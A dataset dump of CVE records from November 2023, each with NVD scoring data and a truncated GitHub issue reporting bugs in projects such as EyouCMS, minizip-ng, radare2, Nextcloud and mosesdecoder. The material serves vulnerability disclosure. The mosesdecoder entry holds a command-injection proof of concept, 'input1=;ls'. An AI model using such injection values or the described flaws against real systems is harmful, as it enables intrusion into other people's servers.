[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Mitigation" ], "url": "https://github.com/Carglglz/upydev/issues/38" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Mitigation" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:carglglz:upydev:0.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "A264C36A-D2B3-4E62-BB7C-6B2E5C0054C4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "326" ]
326
https://github.com/Carglglz/upydev/issues/38
[ "Exploit", "Issue Tracking", "Mitigation" ]
github.com
[ "Carglglz", "upydev" ]
### Description: In the upydev repository, specifically within the keygen.py script, the RSA algorithm is implemented with PKCS 1v1.5 padding, which is known to be insecure and vulnerable to Bleichenbacher](https://link.springer.com/content/pdf/10.1007/bfb0055716.pdf) attack which is a chosen-ciphertext attack that e...
Cryptographic API Misuse Vulnerability: Do not use insecure algorithm(textbook or padding PKCS 1v1.5) for RSA
https://api.github.com/repos/Carglglz/upydev/issues/38/comments
0
2023-11-07T10:12:14Z
2023-11-07T10:12:14Z
https://github.com/Carglglz/upydev/issues/38
1,981,001,689
38
5,763
CVE-2023-46935
2023-11-21T07:15:09.967
eyoucms v1.6.4 is vulnerable Cross Site Scripting (XSS), which can lead to stealing sensitive information of logged-in users.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/55" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E52879A-3ABB-441B-B6A9-A91E6C700778", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/55
[ "Exploit" ]
github.com
[ "weng-xianhu", "eyoucms" ]
Software Link : https://github.com/weng-xianhu/eyoucms Website : http://www.eyoucms.com/ Vulnerable version 1.6.4 download address :https://qiniu.eyoucms.com/source/EyouCMS-V1.6.4-UTF8-SP1_1015.zip After the installation is complete, log in as admin, open the page [![piEvffK.png](https://z1.ax1x.com/2023/10/25/piEv...
There is stored XSS in version 1.6.4 which can lead to stealing sensitive information of logged-in users
https://api.github.com/repos/weng-xianhu/eyoucms/issues/55/comments
1
2023-10-25T08:40:36Z
2024-03-22T02:09:22Z
https://github.com/weng-xianhu/eyoucms/issues/55
1,960,863,122
55
5,764
CVE-2023-48305
2023-11-21T23:15:07.373
Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. Starting in version 25.0.0 and prior to versions 25.0.11, 26.0.6, and 27.1.0 of Nextcloud Server and Nextcloud Enterprise Server, when the log level was set to debug, the user_ldap app logged user passwords in plaintext into the log fi...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integri...
[ { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-35p6-4992-w5fr" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "matchCriteriaId": "CFCB9CDB-F661-496E-86B7-25B228A3C90E", "versionEndExcluding": "25.0.11", "versionEndIncluding": null, "versio...
[ "312" ]
312
https://github.com/nextcloud/server/issues/38461
[ "Exploit", "Issue Tracking" ]
github.com
[ "nextcloud", "server" ]
### ⚠️ This issue respects the following points: ⚠️ - [X] This is a **bug**, not a question or a configuration/webserver/proxy issue. - [X] This issue is **not** already reported on Github _(I've searched it)_. - [X] Nextcloud Server **is** up to date. See [Maintenance and Release Schedule](https://github.com/nextclou...
[Bug]: user_ldap logs user passwords in plain text
https://api.github.com/repos/nextcloud/server/issues/38461/comments
7
2023-05-25T12:57:10Z
2023-08-24T09:42:53Z
https://github.com/nextcloud/server/issues/38461
1,725,776,026
38,461
5,765
CVE-2023-47016
2023-11-22T07:15:07.530
radare2 5.8.9 has an out-of-bounds read in r_bin_object_set_items in libr/bin/bobj.c, causing a crash in r_read_le32 in libr/include/r_endian.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/gandalf4a/65705be4f84269cb7cd725a1d4ab2ffa" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/radareorg/radare2/commit/40c9f...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0E042C08-7911-4974-A2A6-95F0EFD10809", "versionEndExcluding": "5.9.0", "versionEndIncluding": null, "versionStartExcludin...
[ "787" ]
787
https://github.com/radareorg/radare2/issues/22349
[ "Exploit", "Patch" ]
github.com
[ "radareorg", "radare2" ]
# Version ``` $ r2 -v radare2 5.8.9 31339 @ linux-x86-64 birth: git.5.8.8-691-gb2de2288d8 2023-10-17__01:18:28 commit: b2de2288d8299f89288c503fc2ce22381b61aba0 ``` # Platform ``` $ uname -a Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86...
heap-buffer-overflow at /radare2/libr/include/r_endian.h:194:17 in r_read_le32
https://api.github.com/repos/radareorg/radare2/issues/22349/comments
1
2023-10-27T11:53:55Z
2024-08-15T06:27:11Z
https://github.com/radareorg/radare2/issues/22349
1,965,363,992
22,349
5,766
CVE-2023-43887
2023-11-22T18:15:08.747
Libde265 v1.0.12 was discovered to contain multiple buffer overflows via the num_tile_columns and num_tile_row parameters in the function pic_parameter_set::dump.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/strukturag/libde265/commit/63b596c915977f038eafd7647d1db25488a8c133" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/s...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.12:*:*:*:*:*:*:*", "matchCriteriaId": "A736D1CB-9F33-4561-B10C-4074DF6C02F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "120" ]
120
https://github.com/strukturag/libde265/issues/418
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "strukturag", "libde265" ]
## Summary There is a segmentation fault caused by a buffer over-read on pic_parameter_set::dump due to an incorrect value of num_tile_columns or num_tile_rows. ## Tested with: * Commit: 6fc550faeca2bbb1c82de5f29d970f6861146862 (master) * PoC: [poc](https://drive.google.com/file/d/1ISOxgjmw9mPCs-vIh84hsgEB2MfMcwH...
Buffer over-read causes segmentation fault in pic_parameter_set::dump
https://api.github.com/repos/strukturag/libde265/issues/418/comments
7
2023-08-30T14:08:02Z
2024-09-05T13:23:53Z
https://github.com/strukturag/libde265/issues/418
1,873,762,647
418
5,767
CVE-2023-48106
2023-11-22T18:15:09.630
Buffer Overflow vulnerability in zlib-ng minizip-ng v.4.0.2 allows an attacker to execute arbitrary code via a crafted file to the mz_path_resolve function in the mz_os.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/zlib-ng/minizip-ng/issues/740" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "u...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zlib-ng:minizip-ng:4.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "D65B2CB9-EB98-4AA7-AEC5-FE76A1022E72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "787" ]
787
https://github.com/zlib-ng/minizip-ng/issues/740
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "zlib-ng", "minizip-ng" ]
#### Description heap-buffer-overflow (/minizip-ng/build/minizip+0x976d) in mz_path_resolve #### Version ```bash $ ./minizip -h minizip-ng 4.0.2 - https://github.com/zlib-ng/minizip-ng --------------------------------------------------- -h Usage: minizip [-x][-d dir|-l|-e][-o][-f][-y][-c cp][-a][-0 to -9][-b|-...
Heap-buffer-overflow in mz_os.c:188 in mz_path_resolve
https://api.github.com/repos/zlib-ng/minizip-ng/issues/740/comments
5
2023-11-08T12:26:58Z
2023-11-13T18:05:46Z
https://github.com/zlib-ng/minizip-ng/issues/740
1,983,488,868
740
5,768
CVE-2023-48105
2023-11-22T23:15:10.617
An heap overflow vulnerability was discovered in Bytecode alliance wasm-micro-runtime v.1.2.3 allows a remote attacker to cause a denial of service via the wasm_loader_prepare_bytecode function in core/iwasm/interpreter/wasm_loader.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "http://bytecode.com" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://wasm-micro-runtime.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issu...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bytecodealliance:webassembly_micro_runtime:1.2.3:*:*:*:*:*:*:*", "matchCriteriaId": "438EEBB6-205A-496A-A009-321357C86154", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "787" ]
787
https://github.com/bytecodealliance/wasm-micro-runtime/issues/2726
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "bytecodealliance", "wasm-micro-runtime" ]
## Environments **OS** : Ubuntu 18.04 5.4.0-150-generic **Commit** : 52db362b897221c2a438197a0f2e4a9a300becd4 **Version** : iwasm 1.2.3 ## Vulnerability Description **Affected Tool** : iwasm (linux build) **Affected Version** : = 1.2.3 **Impact** : Heap out of bounds read (size of 1) * There is Heap out...
Heap overflow in wasm_loader_prepare_bytecode
https://api.github.com/repos/bytecodealliance/wasm-micro-runtime/issues/2726/comments
2
2023-11-06T17:37:06Z
2024-01-05T11:35:46Z
https://github.com/bytecodealliance/wasm-micro-runtime/issues/2726
1,979,691,341
2,726
5,769
CVE-2023-48107
2023-11-22T23:15:10.663
Buffer Overflow vulnerability in zlib-ng minizip-ng v.4.0.2 allows an attacker to execute arbitrary code via a crafted file to the mz_path_has_slash function in the mz_os.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/zlib-ng/minizip-ng/issues/739" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zlib-ng:minizip-ng:4.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "D65B2CB9-EB98-4AA7-AEC5-FE76A1022E72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "787" ]
787
https://github.com/zlib-ng/minizip-ng/issues/739
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "zlib-ng", "minizip-ng" ]
#### Description heap-buffer-overflow (/minizip-ng/build/minizip+0x8d5a) in mz_path_has_slash #### Version ```bash $ ./minizip -h minizip-ng 4.0.2 - https://github.com/zlib-ng/minizip-ng --------------------------------------------------- -h Usage: minizip [-x][-d dir|-l|-e][-o][-f][-y][-c cp][-a][-0 to -9][-b...
Heap-buffer-overflow in mz_os.c:71 mz_path_has_slash
https://api.github.com/repos/zlib-ng/minizip-ng/issues/739/comments
13
2023-11-08T12:19:50Z
2023-11-13T18:05:37Z
https://github.com/zlib-ng/minizip-ng/issues/739
1,983,475,261
739
5,770
CVE-2023-49298
2023-11-24T19:15:07.587
OpenZFS through 2.1.13 and 2.2.x through 2.2.1, in certain scenarios involving applications that try to rely on efficient copying of file data, can replace file contents with zero-valued bytes and thus potentially disable security mechanisms. NOTE: this issue is not always security related, but can be security related ...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=275308" }, { "source": "cve@mitre.org", "tags": null, "url": "https://bugs.gentoo.org/917224" }, { "source": "cve@mitre.org", "tags": ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openzfs:openzfs:*:*:*:*:*:*:*:*", "matchCriteriaId": "FCB5B44F-BC91-4DBC-A67B-96D577834ACB", "versionEndExcluding": null, "versionEndIncluding": "2.1.13", "versionStartExclud...
[ "639" ]
639
https://github.com/openzfs/zfs/issues/15526
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "openzfs", "zfs" ]
<!-- Please fill out the following template, which will help other contributors address your issue. --> <!-- Thank you for reporting an issue. *IMPORTANT* - Please check our issue tracker before opening a new issue. Additional valuable information can be found in the OpenZFS documentation and mailing list arch...
some copied files are corrupted (chunks replaced by zeros)
https://api.github.com/repos/openzfs/zfs/issues/15526/comments
338
2023-11-14T13:30:40Z
2024-03-13T01:57:10Z
https://github.com/openzfs/zfs/issues/15526
1,992,751,216
15,526
5,771
CVE-2023-6309
2023-11-27T02:15:42.797
A vulnerability, which was classified as critical, was found in moses-smt mosesdecoder up to 4.0. This affects an unknown part of the file contrib/iSenWeb/trans_result.php. The manipulation of the argument input1 leads to os command injection. The exploit has been disclosed to the public and may be used. The associated...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.2, "confidentialityImpact...
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "VDB Entry" ], "url": "https://github.com/moses-smt/mosesdecoder/issues/237" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:moses-smt:mosesdecoder:*:*:*:*:*:*:*:*", "matchCriteriaId": "8F7BF510-5916-4C34-9DB3-7EB4C12A9DE3", "versionEndExcluding": "4.0", "versionEndIncluding": null, "versionStartEx...
[ "78" ]
78
https://github.com/moses-smt/mosesdecoder/issues/237
[ "Exploit", "Issue Tracking", "VDB Entry" ]
github.com
[ "moses-smt", "mosesdecoder" ]
https://github.com/moses-smt/mosesdecoder/blob/master/contrib/iSenWeb/trans_result.php poc: input1=;ls
webshell exists in the project
https://api.github.com/repos/moses-smt/mosesdecoder/issues/237/comments
3
2023-11-03T02:31:42Z
2025-01-16T18:24:05Z
https://github.com/moses-smt/mosesdecoder/issues/237
1,975,366,922
237
5,772
CVE-2023-29770
2023-11-28T00:15:07.033
In Sentrifugo 3.5, the AssetsController::uploadsaveAction function allows an authenticated attacker to upload any file without extension filtering.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/sapplica/sentrifugo" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/sapplica/sentrifugo/issues/384" }, { "source": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sapplica:sentrifugo:3.5:*:*:*:*:*:*:*", "matchCriteriaId": "9EC47DC7-B208-4E30-8B09-8FBCD3302E8D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "434" ]
434
https://github.com/sapplica/sentrifugo/issues/384
[ "Exploit", "Third Party Advisory" ]
github.com
[ "sapplica", "sentrifugo" ]
# Bug: Authenticated - Unrestricted file upload ## Description The `AssetsController::uploadsaveAction` function allows an authenticated attacker to upload any file without extension filtering. ## Vulnerability Detail The `uploadsaveAction` function allows an attacker to take full control of the extension a...
Authenticated - Unrestricted file upload
https://api.github.com/repos/sapplica/sentrifugo/issues/384/comments
0
2023-03-08T06:58:49Z
2023-03-08T07:32:24Z
https://github.com/sapplica/sentrifugo/issues/384
1,614,753,704
384
5,773
CVE-2023-45286
2023-11-28T17:15:08.280
A race condition in go-resty can result in HTTP request body disclosure across requests. This condition can be triggered by calling sync.Pool.Put with the same *bytes.Buffer more than once, when request retries are enabled and a retry occurs. The call to sync.Pool.Get will then return a bytes.Buffer that hasn't had byt...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "int...
[ { "source": "security@golang.org", "tags": null, "url": "https://github.com/go-resty/resty/commit/577fed8730d79f583eb48dfc81674164e1fc471e" }, { "source": "security@golang.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/go-resty/resty/issues/739"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:resty_project:resty:*:*:*:*:*:go:*:*", "matchCriteriaId": "433974E8-CB64-4BBB-BB5A-9F072275B86F", "versionEndExcluding": null, "versionEndIncluding": "2.10.0", "versionStartE...
[ "362" ]
362
https://github.com/go-resty/resty/issues/739
[ "Exploit", "Issue Tracking" ]
github.com
[ "go-resty", "resty" ]
We detected a data race in resty's middleware when releasing/resetting the buffer. Please check. Go Version: 1.21.1 Resty Version: v2.10.0 ``` ================== WARNING: DATA RACE Read at 0x00c001e91ce0 by goroutine 537694: bytes.(*Buffer).Reset() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-li...
DATA RACE in resty's middleware (go-resty/resty/v2.releaseBuffer())
https://api.github.com/repos/go-resty/resty/issues/739/comments
2
2023-10-25T13:29:37Z
2024-01-11T10:14:09Z
https://github.com/go-resty/resty/issues/739
1,961,435,191
739
5,774
CVE-2023-45286
2023-11-28T17:15:08.280
A race condition in go-resty can result in HTTP request body disclosure across requests. This condition can be triggered by calling sync.Pool.Put with the same *bytes.Buffer more than once, when request retries are enabled and a retry occurs. The call to sync.Pool.Get will then return a bytes.Buffer that hasn't had byt...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "int...
[ { "source": "security@golang.org", "tags": null, "url": "https://github.com/go-resty/resty/commit/577fed8730d79f583eb48dfc81674164e1fc471e" }, { "source": "security@golang.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/go-resty/resty/issues/739"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:resty_project:resty:*:*:*:*:*:go:*:*", "matchCriteriaId": "433974E8-CB64-4BBB-BB5A-9F072275B86F", "versionEndExcluding": null, "versionEndIncluding": "2.10.0", "versionStartE...
[ "362" ]
362
https://github.com/go-resty/resty/issues/743
[ "Issue Tracking" ]
github.com
[ "go-resty", "resty" ]
In v2.10.0, I've observed an issue where the request body passed to `.SetBody(...)` is intermittently written multiple times under certain conditions. From what I gather, it is somehow related to the retry mechanism, or at the very least I was only able to reproduce by triggering that. [In the repro here](https:/...
Request body is written multiple times
https://api.github.com/repos/go-resty/resty/issues/743/comments
2
2023-10-30T10:41:32Z
2023-12-27T05:37:48Z
https://github.com/go-resty/resty/issues/743
1,968,036,476
743
5,775
CVE-2023-49092
2023-11-28T21:15:08.530
RustCrypto/RSA is a portable RSA implementation in pure Rust. Due to a non-constant-time implementation, information about the private key is leaked through timing information which is observable over the network. An attacker may be able to use that information to recover the key. There is currently no fix available. A...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "int...
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/RustCrypto/RSA/issues/19#issuecomment-1822995643" }, { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/RustCryp...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rustcrypto:rsa:*:*:*:*:*:rust:*:*", "matchCriteriaId": "248AAFCD-E795-48F3-AC41-468B1E2EB267", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "203" ]
203
https://github.com/RustCrypto/RSA/issues/19#issuecomment-1822995643
[ "Issue Tracking" ]
github.com
[ "RustCrypto", "RSA" ]
Hi there, I'm the author of sidefuzz (https://github.com/phayes/sidefuzz) and I have found what appears to be variable-time behavior in the `rsa::internals::encrypt()` function. Specifically, `rsa::internals::encrypt()` appears to be variable-time in relation to the message. Note that I haven't worked this up int...
modpow implementation is not constant-time
https://api.github.com/repos/RustCrypto/RSA/issues/19/comments
81
2019-04-30T19:50:46Z
2025-06-02T13:45:17Z
https://github.com/RustCrypto/RSA/issues/19
438,948,363
19
5,776
CVE-2023-48880
2023-11-29T16:15:07.167
A stored cross-site scripting (XSS) vulnerability in EyouCMS v1.6.4-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Menu Name field at /login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gith...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E52879A-3ABB-441B-B6A9-A91E6C700778", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/52
[ "Exploit", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
**Version**: <=EyouCMS-V1.6.4-UTF8-SP1 ![20230823184917](https://github.com/weng-xianhu/eyoucms/assets/72898290/36522963-664f-4ac1-a291-e68a2952124b) **Description**: 1. Login to the back-end with an administrator account, click "Member Center", select "Function Configuration", then find "Frontend Style Settings"...
EyouCMS-V1.6.4-UTF8-SP1 has a vulnerability, Stored Cross-Site Scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/52/comments
1
2023-08-23T11:20:28Z
2024-03-22T06:45:21Z
https://github.com/weng-xianhu/eyoucms/issues/52
1,863,129,078
52
5,777
CVE-2023-48881
2023-11-29T16:15:07.217
A stored cross-site scripting (XSS) vulnerability in EyouCMS v1.6.4-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Field Title field at /login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E52879A-3ABB-441B-B6A9-A91E6C700778", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/53
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
**Version**: <=EyouCMS-V1.6.4-UTF8-SP1 ![20230823184917](https://github.com/weng-xianhu/eyoucms/assets/72898290/4c14b7a3-5445-460e-a5da-2ad47ccecff6) **Description**: 1. Log in to the backend with an administrator account, click on "Feature Map" and add "Column Fields". ![20230823203513](https://github.com/weng-...
EyouCMS-V1.6.4-UTF8-SP1 has a vulnerability, Stored Cross-Site Scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/53/comments
1
2023-08-23T13:24:48Z
2024-03-22T06:39:31Z
https://github.com/weng-xianhu/eyoucms/issues/53
1,863,334,194
53
5,778
CVE-2023-48882
2023-11-29T16:15:07.270
A stored cross-site scripting (XSS) vulnerability in EyouCMS v1.6.4-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Document Properties field at /login.php m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E52879A-3ABB-441B-B6A9-A91E6C700778", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/54
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
**Version**: <=EyouCMS-V1.6.4-UTF8-SP1 ![20230823184917](https://github.com/weng-xianhu/eyoucms/assets/72898290/4c14b7a3-5445-460e-a5da-2ad47ccecff6) **Description**: 1. Log in to the backend with an administrator account, click on "Function Map" and add "Document Properties". ![20230823221128](https://github.co...
EyouCMS-V1.6.4-UTF8-SP1 has a vulnerability, Stored Cross-Site Scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/54/comments
1
2023-08-23T14:31:08Z
2024-03-22T06:30:31Z
https://github.com/weng-xianhu/eyoucms/issues/54
1,863,459,135
54
5,779
CVE-2023-48945
2023-11-29T20:15:07.797
A stack overflow in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1172" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
